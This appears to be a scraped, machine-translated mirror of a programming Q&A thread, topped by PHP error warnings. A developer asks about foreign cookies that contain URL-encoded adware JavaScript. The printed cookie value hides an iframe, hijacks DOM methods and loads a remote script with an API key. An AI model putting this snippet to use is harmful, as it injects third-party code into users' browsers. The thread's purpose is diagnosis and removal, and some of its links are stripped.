Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/oracle/9.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Javascript 客户端请求中的外来cookie_Javascript_Malware_Web Application Firewall - Fatal编程技术网

Javascript 客户端请求中的外来cookie

Javascript 客户端请求中的外来cookie,javascript,malware,web-application-firewall,Javascript,Malware,Web Application Firewall,一些客户端向我们的webapp发送请求,并附带以下cookie: vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%2

一些客户端向我们的webapp发送请求,并附带以下cookie:

vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false;  vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;
我们的应用程序不安装此类cookie。我们使用了一些外部JavaScript,比如Google Analytics,但这些脚本都没有这样做。我们的站点只能通过HTTPS访问,因此不太可能修改MITM请求

我们使用WAF,这些请求被阻止,客户端不满意

我想,某个恶意浏览器扩展正试图利用某个流行的web引擎漏洞进行攻击

有人遇到过这样的事情吗?有什么想法吗


另一方面,该cookie的URL解码内容是javascript,其中包含指向的链接,但它们可能只是被骗子用来赚钱的攻击。

找到了它。此恶意软件执行以下操作:(俄语文章)和


小结:

有一个恶意软件,它在Chrome、Firefox和IE的r.srvtrck.com网站上创建弹出式广告窗口。它还可能将广告整合到您打开的网站中

要删除它,您可以使用:

  • 节目
  • 节目
  • 重置浏览器设置
  • 在浏览器可执行文件之后,从添加的站点地址清除*.lnk文件
  • 阻止广告的程序(我不建议这样做,只需清除系统并使用AdBlock/uBlock)

建议检查Windows任务计划程序中是否存在不需要的任务,这些任务会定期启动带有恶意软件站点地址的浏览器。

我猜这些都是XSS cookies。我真的不知道这是谁干的attacks@andrew-迈尔斯,给你。